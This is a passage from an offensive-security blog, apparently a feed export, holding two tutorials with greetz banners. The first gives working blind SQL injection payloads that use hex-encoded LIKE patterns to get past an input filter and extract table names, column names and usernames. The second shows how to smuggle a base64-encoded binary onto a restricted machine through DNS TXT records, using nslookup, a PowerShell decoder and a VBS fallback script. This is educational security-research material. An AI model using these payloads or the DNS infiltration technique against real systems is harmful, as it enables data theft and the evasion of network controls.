<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<p><br /><br /></p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-53776035768241919342020-09-06T10:59:00.009+05:302023-11-23T10:32:29.402+05:30SQL Injection filter bypass to perform blind SQL Injection<p>Hello, in this blog post will discuss about a scenario in which web application was vulnerable to SQL Injection but user input was getting filter by code to remove characters such as ' " ( ) % etc. <br /><br /><span style="color: white;"><b>Technology/back-end used by Web application </b></span></p><ol style="text-align: left;"><li>PHP </li><li>MySQL <br /></li></ol><h2 style="text-align: left;"><span style="color: white;">Scenario: </span></h2><br />The PHP code was accepting the user input through HTTP GET parameter "param1". The value was passing it to a custom data filtering function "input-filter".<br /><p style="text-align: left;">The function "input-filter" is meant to perform filtering of some special characters which can lead to SQL Injection.<br /> </p><p style="text-align: left;">After performing input sensitization, function pass the data to SQL query in PHP code.<br />In SQL query, user data ($user_input) was getting passed as "Column name" in "select" statement as follow:<br /><br /><textarea style="height: 16px; margin: 0px; width: 949px;">$query = mysqli_query($connection,"SELECT $user_input,time FROM stats WHERE depth = '$depth' ORDER BY times ASC"); </textarea><br /> </p><p style="text-align: left;">Web application code was just processing the SQL query output and no output was shown on web interface. Due to this fact, union based SQL injection was not possible.<br /><br />Web application code was not using "mysqli_error()" to show SQL server error messages which killed the chance to perform error based SQL Injection.</p><p style="text-align: left;">The only possibility was Blind SQL Injection. To perform blind SQL injection, there was limitation as web application "input-filter" function stripping out characters which are mentioned below:<br /><textarea style="height: 24px; margin: 0px; width: 222px;">" < > = ' ( ) & @ % # ; </textarea><br /><br />When we use basic boolean based blind injection payload such as:<br />
</p><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 28px; margin: 0px; width: 600px;"> 1 from dual where true and 1< ascii ( substring ( database (),1,1 ) )</textarea></span></p><p>After passing through user input filter function, payload was changing to the below mentioned one:<br /><span style="color: black; mso-color-alt: windowtext;"><br /><textarea style="height: 27px; margin: 0px; width: 499px;"> 1 from dual where true and 1 ascii substring database ,1,1</textarea></span><br /><br /><span style="color: white;"><b>URL encoded payload processing:</b> <br /></span></p><p>Web application user input filter function was stripping out % character as well which was making payload of no use.<br />Let's consider, URL encoding has been used for character ( and ), and payload is like this:</p><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 30px; margin: 0px; width: 726px;">1 from dual where true and 1 %3C ascii %28 substring %28 database %28 %29 %2C 1 %2C 1 %29%29</textarea></span><br /></p>After processing through user input filter function payload was becoming like this:<p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 29px; margin: 0px; width: 673px;"> 1 from dual where true and 1 3C ascii 28 substring 28 database 28 29 2C 1 2C 1 2929 </textarea><br /></span></span></p><br /><h2 style="text-align: left;"><span style="color: white;">Exploitation: </span></h2>In this case, my way to perform exploitation was blind injection. To avoid stripping of payload characters, in combination of where condition, I used "like" clause with hex representation. <br /><br /><span style="color: white;"><b>Like Clause and hex encoded wildcard search pattern:</b></span><br />Let's have a look on like clause functionality.<br /><br />'Like' clause is such operator which has functionality to perform search in SQL database using wildcard search pattern.<br /> <br />For example, if user want to perform search for text in a column which has string 'user' in it anywhere, SQL query will be:<br /><p class="FindingCode" style="text-align: left;"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 25px; margin: 0px; width: 547px;"> select column_name from table_name where value_in_column like '%user%'</textarea><br /></span><br />The above-mentioned SQL query will retrieve the data from column which has string 'user' anywhere in it.<br /><br />Like clause not just only take input in single quotes but also in hex form<br /><br /><textarea style="height: 42px; margin: 0px; width: 274px;">Text Hex encoded value
%user% 257573657225</textarea><span style="color: black; mso-color-alt: windowtext;"><br /></span></p><p class="FindingCode" style="text-align: left;">Means, we can use SQL query with "like" clause and "hex encoded wildcard value" like this:<span style="color: black; mso-color-alt: windowtext;"><br /></span></p><p class="FindingCode" style="text-align: left;"><span style="color: black; mso-color-alt: windowtext;"><textarea style="height: 29px; margin: 0px; width: 586px;"> select column_name from table_name where value_in_column like 0x257573657225</textarea><br /></span><br /></p><h3 style="text-align: left;"><span style="color: white;"><b>Extracting tables and columns name</b></span></h3><p class="FindingCode" style="text-align: left;">To perform exploitation in this scenario, I followed below mentioned things:<br /></p><ol style="text-align: left;"><li>There is restriction not to use characters such as ' ( ) < > %</li><li>User input is getting pass to column name field in "select" statement, so used "1 from dual" to complete the "select" statement.</li><li>Use of "like" clause with hex encoded wildcard pattern.</li><li>Guess characters one-by-one <br /></li></ol><p><span style="color: white;"><b>Table name extraction payload:</b></span></p><p>Consider, we have a table name value "auth". <br /></p><p>Payload to look for table name "auth" (which has first character 'a') using like clause:</p><p><textarea style="height: 21px; margin: 0px; width: 676px;">select table_name from information_schema.tables where table_name like 'a%' limit 0,1</textarea></p><p>Payload with hex encoded like clause wildcard value:</p><p><textarea style="height: 20px; margin: 0px; width: 710px;">select table_name from information_schema.tables where table_name like 0x6125 limit 0,1</textarea></p><p>In my case, user data is getting pass as column name in SQL query, payload was: <br /></p><p><textarea style="height: 20px; margin: 0px; width: 710px;">table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- -</textarea></p><p>SQL query in application was executing as:<br /></p><p><textarea style="height: 16px; margin: 0px; width: 1230px;">select table_name from information_schema.tables where table_name like 0x6125 limit 0,1-- - ,time FROM stats WHERE AND depth = '$depth' ORDER BY times ASC</textarea></p><p></p><p><b></b></p><div class="separator" style="clear: both; text-align: center;"><b><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzf4IiyxDb5cglLZQCmE1ZMplVDOLC5ErTIkTum58zp_II2MwUOyuXW7L5nnPeJAOCaO5b4YLdvpOjJNHmha5nqy5qz8WBrX3SVWbJclnC6BLynfmSHwmoreWwuIrK3hyphenhyphenhSwPGvIOpmKY/s1166/table_name1.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="538" data-original-width="1166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzf4IiyxDb5cglLZQCmE1ZMplVDOLC5ErTIkTum58zp_II2MwUOyuXW7L5nnPeJAOCaO5b4YLdvpOjJNHmha5nqy5qz8WBrX3SVWbJclnC6BLynfmSHwmoreWwuIrK3hyphenhyphenhSwPGvIOpmKY/s16000/table_name1.png" /></a></b></div><b> </b><p></p><p><span style="color: white;"><b>Column name extraction payload:</b></span></p><p>Consider, we have a column name value "username" for table "auth". <br /></p><p>Payload to look for column name "username" (which has first character 'u') using like clause of table "admin":</p><p><textarea style="height: 23px; margin: 0px; width: 927px;">select column_name from information_schema.columns where table_name like 'auth' and column_name like 'u%' limit 0,1</textarea></p><p>Payload with hex encoded like clause wildcard value:</p><p><textarea style="height: 23px; margin: 0px; width: 961px;">select column_name from information_schema.columns where table_name like 0x61757468 and column_name like 0x7525 limit 0,1</textarea></p><p></p><div><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><b> </b></span></p>
<p></p></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9utLoUJeDImlc2dW1d7wSiDXiYsyrKzjUAeL1kLLtM435oLmM5Z2ayu5s3BQ_83CUQ9ojrsPT-uhJxj37jhbATwFiCy-NwmxZuTvyvHb8xJ1_tre_9RTumySmc7RdJ0tNAFceNK4nZQ/s1452/column+name.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="355" data-original-width="1452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjo9utLoUJeDImlc2dW1d7wSiDXiYsyrKzjUAeL1kLLtM435oLmM5Z2ayu5s3BQ_83CUQ9ojrsPT-uhJxj37jhbATwFiCy-NwmxZuTvyvHb8xJ1_tre_9RTumySmc7RdJ0tNAFceNK4nZQ/s16000/column+name.png" /></a></div><p></p><p><span style="color: white;"><b>Data extraction payload:</b></span></p><p>To extract the data from column "username" of table "auth", use like clause with hex encoded wildcard apttern. <br /></p><p>Payload to look for username "ace" in column "username" of table "auth" using like clause:</p><p><textarea style="height: 23px; margin: 0px; width: 927px;">select username from auth where username like 'a%' limit 0,1</textarea></p><p>Payload with hex encoded like clause wildcard value:</p><p><textarea style="height: 23px; margin: 0px; width: 961px;">select username from auth where username like 0x6125 limit 0,1</textarea></p><div><p class="FindingCode"><span style="color: black; mso-color-alt: windowtext;"><b> </b></span></p>
</div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkvXvHtpLWR2pUrSPIj-K8dKpy0cIEyy90Vh5R7ypjrgK8wvw5e6VhLp9l9jHfudr0VDVQPTuzR5WizWE5FSjDToYKAfMJerx3cwfXWVY6CB7jxcGypPR1jDKZRE6DqRWoRyPMFJSOjY/s980/data.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="533" data-original-width="980" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxkvXvHtpLWR2pUrSPIj-K8dKpy0cIEyy90Vh5R7ypjrgK8wvw5e6VhLp9l9jHfudr0VDVQPTuzR5WizWE5FSjDToYKAfMJerx3cwfXWVY6CB7jxcGypPR1jDKZRE6DqRWoRyPMFJSOjY/s16000/data.png" /></a></div></div><div class="separator" style="clear: both; text-align: center;"> </div>
<h2 style="text-align: left;">
<span style="color: white;">Conclusion:</span></h2>
<div style="text-align: left;">
SQL injection exploitation can be tricky but there may be a way to perform it. </div>
<h2 style="text-align: left;">
<span style="color: white;">Remediation:</span></h2>
<div style="text-align: left;">
To prevent SQL Injection attack, refer OWASP guide:</div>
<div style="text-align: left;">
<a href="https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html">https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html</a></div>
<br />
Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/albinowax" target="_blank">James Kettle</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui" , "arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-54888923791079787272020-08-08T18:50:00.001+05:302023-11-23T10:32:43.040+05:30Bypassing internet connectivity and copy-paste restriction to Infiltrating malicious data<p style="text-align: center;"> </p><p style="text-align: left;">In this blog post will discuss about the infiltration of data to a machine which has following restrictions:</p><ol style="text-align: left;"><li>Internet connectivity is not allowed.</li><li>Copy-Paste operation is blocked.</li><li>File uploading is restricted <br /></li></ol><h2 style="text-align: left;">Scenario: <br /></h2><p style="text-align: left;">We have a machine which is not connected to internet but hosted inside the corporate network. The machine is connected to a DNS server which can resolve the internet based domain DNS queries.</p><p style="text-align: left;">Here, to import the malicious binary file or code, we make DNS request to internal DNS server. Internal DNS server perform the query from internet and send back the output to user machine.<br /></p><p style="text-align: left;">Host machine cant not reach internet based domain name.</p><p style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfiHbQwn4EfUlnIofyGVV5YSlY0hrz6FTS4z0_7RqqBC8XKBujZsARKwx7xLxnUvEdWzuherXUIuSXPsM-JJaVopV6sTkJcL3Lae7jrYNqf7lCxB4P_sAzHs_VVyh7w7qwUu1dWy4HuX0/s603/1.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="171" data-original-width="603" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfiHbQwn4EfUlnIofyGVV5YSlY0hrz6FTS4z0_7RqqBC8XKBujZsARKwx7xLxnUvEdWzuherXUIuSXPsM-JJaVopV6sTkJcL3Lae7jrYNqf7lCxB4P_sAzHs_VVyh7w7qwUu1dWy4HuX0/s0/1.png" /></a></p><p style="text-align: left;">But when user perform DNS query, it is getting routed therough one of internal DNS server and domain name is getting resolved.</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCiWG1yScVSHujpMJZm7W-5pE2ajPc4XI8RsrEOsXHs_HkaapbhkXjFQGyTSRxEVU10KwWYwWM5AuYafXO5QGmA69IhMUVJiFuN7YZj5vS3yxThs54QVYvqjc3zKHpbsFDGLjeDSHkcxo/s580/2.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="184" data-original-width="580" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCiWG1yScVSHujpMJZm7W-5pE2ajPc4XI8RsrEOsXHs_HkaapbhkXjFQGyTSRxEVU10KwWYwWM5AuYafXO5QGmA69IhMUVJiFuN7YZj5vS3yxThs54QVYvqjc3zKHpbsFDGLjeDSHkcxo/s0/2.png" /></a></div><p style="text-align: center;"></p><p></p><h2 style="text-align: left;">Infiltrating the data from internet using DNS TXT record </h2><p>DNS TXT record allow user to specify the text for the domain name. Definition provided by Wikipedia is:</p><p><i>"A TXT record (short for text record) is a type of resource record in the Domain name systemically (DNS) used to provide the ability to associate arbitrary text with a host or other name, such as human readable information about a server, network, data center, or other accounting information."</i> <br /></p><p>I added the TXT record for domain name "box.mannulinux.org" <br /></p><div class="separator" style="clear: both;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpJKxOKO3fL5I8sjSwApOkWMDu6SWKNCsjotBWZp0lRd9qFIe-7So2wzAhsX3crNPLTHCU3X4RJqg9t5zBf00mkLV7MAk7aTwQ4O4GVuuTP-OasF-c9wVv_ePXoGa1IQ41t25aKP5k7k/s1278/0.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="190" data-original-width="1278" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBpJKxOKO3fL5I8sjSwApOkWMDu6SWKNCsjotBWZp0lRd9qFIe-7So2wzAhsX3crNPLTHCU3X4RJqg9t5zBf00mkLV7MAk7aTwQ4O4GVuuTP-OasF-c9wVv_ePXoGa1IQ41t25aKP5k7k/s640/0.png" width="640" /></a></div><p style="text-align: left;">NSLOOKUP command has facility to perform DNS TXT record query for a domain. To perform the TXT record query, use below mentioned command:</p><p style="text-align: left;"><textarea cols="30" rows="6" style="height: 20px; margin: 0px; width: 300px;">nslookup -querytype=txt domain_name</textarea><br /> <br />In my case it will be:</p><p style="text-align: left;"><textarea cols="30" rows="6" style="height: 20px; margin: 0px; width: 400px;">nslookup -querytype=txt box.mannulinux.org</textarea></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdG5x-chCY_kOVkKIrxyEx8Nb05pPNI0f1a6wi5UmMZq8f6_aG8dQmlCmcAKc4lJvba06ZJHzVWF-TOKKzgKrztI1Ho1sSaVULYPr8F9XVybZLEkjBt3WHlAgRNuUzSykuFMjMm6UTP0E/s481/3.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="193" data-original-width="481" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdG5x-chCY_kOVkKIrxyEx8Nb05pPNI0f1a6wi5UmMZq8f6_aG8dQmlCmcAKc4lJvba06ZJHzVWF-TOKKzgKrztI1Ho1sSaVULYPr8F9XVybZLEkjBt3WHlAgRNuUzSykuFMjMm6UTP0E/s0/3.png" /></a></div><p style="text-align: left;">TXT record dont have restriction on type of text which can be specified by a user. User can specify the base64 encoded text or even binary:</p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVCuW5XPZatpwkcrVB1PKQaEzD0Qn8xAtpRX9NxCYSBvFeHIF3xVBey0E337C9qId743B1kKiwyO_UiDcivhurE_ScrMPIoTVr0oswwO72S_yYq1uCRU-6IMxKg0dkUnDPtX0ezWdaoiU/s1335/0.1.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="247" data-original-width="1335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVCuW5XPZatpwkcrVB1PKQaEzD0Qn8xAtpRX9NxCYSBvFeHIF3xVBey0E337C9qId743B1kKiwyO_UiDcivhurE_ScrMPIoTVr0oswwO72S_yYq1uCRU-6IMxKg0dkUnDPtX0ezWdaoiU/s640/0.1.png" width="640" /></a></div><p style="text-align: left;">Again perform the query and we will get the data:<br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3JhzIzg4JK1XJIAw9eD-w_qUQkWTl4qoWZpUh3mRIBVfgxqF2UXtBHxrtJWv0LbrBF536Do4Lds6xdPQwYVZkekl_iXQFOzous_mm-cfp9xIRy62m94xq8xjmf_CTbdevI8BYIKBUsv4/s544/4.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="203" data-original-width="544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3JhzIzg4JK1XJIAw9eD-w_qUQkWTl4qoWZpUh3mRIBVfgxqF2UXtBHxrtJWv0LbrBF536Do4Lds6xdPQwYVZkekl_iXQFOzous_mm-cfp9xIRy62m94xq8xjmf_CTbdevI8BYIKBUsv4/s0/4.png" /></a></p><h3 style="text-align: left;"></h3><h2 style="text-align: left;">Decoding the text using PowerShell<br /></h2><p>To get the actual data, we need to perform base64 decoding and it can be achieved using Powershell.</p><p>Below mentioned Powershell code help user to get the base64 decoded data from encoded string:</p><p style="text-align: left;"><br />
<textarea style="height: 100px; margin: 0px; width: 700px;">$all = "base64_encoded_string_goes_here"
$text = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($all))
$text
</textarea>
<br /></p><h2 style="text-align: left;"> Import Big text </h2><p>To import text, I used "Namecheap" domain service. There may be restriction on TXT record input data due to DNS server implementation.<br /></p><p>In case, user is not able to insert complete text due to data limit, user can associate multiple TXT records for a domain name. </p><p>So to import text which has length more then what you can specify in TXT record, add multiple TXT records. When DNS query will be performed, data will be fetched.</p><p>Converted the binary file data into base64 encoded form and specified in TXT record:<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLikUumTABd2jXcyWUnhgVy9r8OT_EXJ6CwKPi6ATfsCKMh6FgtElOZNUbpfkjfOA6-BAXk93n_t-ZwscKH1W1GOM3EjZl0lYd1MQJyFp7DVfmSqyVmynyya2g5P_9o38lQW78rf95XY/s1161/0.2.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="190" data-original-width="1161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLLikUumTABd2jXcyWUnhgVy9r8OT_EXJ6CwKPi6ATfsCKMh6FgtElOZNUbpfkjfOA6-BAXk93n_t-ZwscKH1W1GOM3EjZl0lYd1MQJyFp7DVfmSqyVmynyya2g5P_9o38lQW78rf95XY/s640/0.2.png" width="640" /></a></p> Performed the DNS query to get the data embedded in TXT record:<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvNL2kNXq8LEWxNCVi9pWz24M6zpRK_P-L91tZw2mkFLH_RWon8Zbx3-Nt2W10p8kg4Uc51bEBjMiuo8ydJeJx81nuR-7cOXcRp_9Vyyu5K6GcAHvm327xnwzZOX50ER0dw7qJPqLHL8Q/s1198/8.png" style="display: block; padding: 1em 0px;"><img border="0" data-original-height="466" data-original-width="1198" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjvNL2kNXq8LEWxNCVi9pWz24M6zpRK_P-L91tZw2mkFLH_RWon8Zbx3-Nt2W10p8kg4Uc51bEBjMiuo8ydJeJx81nuR-7cOXcRp_9Vyyu5K6GcAHvm327xnwzZOX50ER0dw7qJPqLHL8Q/s640/8.png" width="640" /></a></div><p>Now, perform the base64 decoding operation on the grabbed text and save it in the file.<br /></p><h2 style="text-align: left;">PowerShell and CMD is restricted <br /></h2><p> In case, host machine is hardened and user is not allow to access either PowerShell or CMD, we can use VBS code to perform DNS query.<br />Here is the code which will perform DNS query and save the output to file "nslookup.txt" in "C:\Users\box\Desktop\" directory:<br /><br />
<textarea style="height: 150px; margin: 0px; width: 900px;">Set objFileToWrite = CreateObject("Scripting.FileSystemObject").OpenTextFile("C:\Users\box\Desktop\nslookup.txt",2,true)
Set objShell = CreateObject("WScript.Shell")
Set objWshScriptExec = objShell.Exec("nslookup.exe -querytype=txt b0x2.mannulinux.org")
Set objStdOut = objWshScriptExec.StdOut
While Not objStdOut.AtEndOfStream
strLine = objStdOut.ReadLine
objFileToWrite.WriteLine(strLine)
Wend
objFileToWrite.Close
Set objFileToWrite = Nothing
</textarea>
<br />Thanks for reading :)<br />
<br />
Special thanks to <a href="https://twitter.com/PyroTek3" target="_blank">Sean Metcalf</a>, <a href="https://twitter.com/TheColonial" target="_blank">OJ</a>, <a href="https://twitter.com/hackerfantastic" target="_blank">hacker fantastic</a>, <a href="https://twitter.com/ka3hk" target="_blank">A K Reddy</a>,<a href="https://twitter.com/vysecurity" target="_blank">Vincent Yiu</a>, <a href="https://twitter.com/_wald0" target="_blank">Andrew Robbins</a>, <a href="https://twitter.com/harmj0y" target="_blank">will</a>,
<a href="https://twitter.com/gentilkiwi" target="_blank">Benjamin Delpy</a>, <a href="https://twitter.com/byt3bl33d3r" target="_blank">Marcello</a>, <a href="https://twitter.com/vanderaj" target="_blank">Andrew van der Stock</a>, <a href="https://twitter.com/g0tmi1k" target="_blank">g0tmi1k</a>, <a href="https://twitter.com/pwntester" target="_blank">Alvaro Muñoz</a>, <a href="https://twitter.com/FuzzySec" target="_blank">b33f</a>, <a href="https://twitter.com/trufae" target="_blank">pancake</a>, <a href="https://twitter.com/m3g9tr0n" target="_blank">m3g9tr0n</a>, <a href="https://twitter.com/hexachordanu" target="_blank">Anurag Srivastava</a>, <a href="https://twitter.com/be_vvk" target="_blank">vivek chauhan</a>
<br />
</p><div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div>
<br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;">--==[[ With Love from Team IndiShell ]]==--</span><br />
<span style="background-color: black; color: #bbbbbb; font-family: "segoe ui","arial"; font-size: 16px;"> </span><br />
<div class="line number44 index43 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[ Greetz To ]]==--</code></div>
<div class="line number45 index44 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">############################################################################################</code></div>
<div class="line number46 index45 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#zero cool, code breaker ica, root_devil, google_warrior, INX_r0ot, Darkwolf indishell, Baba</code></div>
<div class="line number47 index46 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Silent poison India, Magnum sniper, ethicalnoob Indishell, Reborn India, L0rd Crus4d3r, cool toad</code></div>
<div class="line number48 index47 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Hackuin,Alicks,mike waals, Dinelson Amine, cyber gladiator, Cyber Ace, Golden boy INDIA</code></div>
<div class="line number49 index48 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Ketan Singh, AR AR, saad abbasi, Minhal Mehdi, Raj bhai ji, Hacking queen, lovetherisk, Bikash Dash, D3</code></div>
<div class="line number50 index49 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#############################################################################################</code></div>
<div class="line number51 index50 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text spaces"> </code><code class="text plain">--==[[Love to]]==--</code></div>
<div class="line number52 index51 alt1" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#
My Father ,my Ex Teacher, cold fire hacker, Mannu, ViKi,Ashu bhai
ji, Soldier Of God, Bhuppi, Anurag, Cyber Warrior, Vivek Sir</code></div>
<div class="line number53 index52 alt2" style="background-color: black; color: #bbbbbb; font-family: "segoe ui", arial; font-size: 16px;">
<code class="text plain">#Mohit, Ffe, Ashish, Shardhanand, Budhaoo,Incredible, Hacker fantastic, Jennifer Arcuri and Don(Deepika kaushik)</code></div>
</div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<br />
<p> </p><p> </p><p></p>Mannu Linuxhttp://www.blogger.com/profile/00618753918803236379noreply@blogger.com0tag:blogger.com,1999:blog-6893238704654067208.post-84708985428217890192020-07-29T09:36:00.001+05:302023-11-23T10:33:00.173+05:30Arbitrary file upload vulnerability in Wordpress wpDiscuz plugin <div dir="ltr" style="text-align: left;" trbidi="on">
<br />
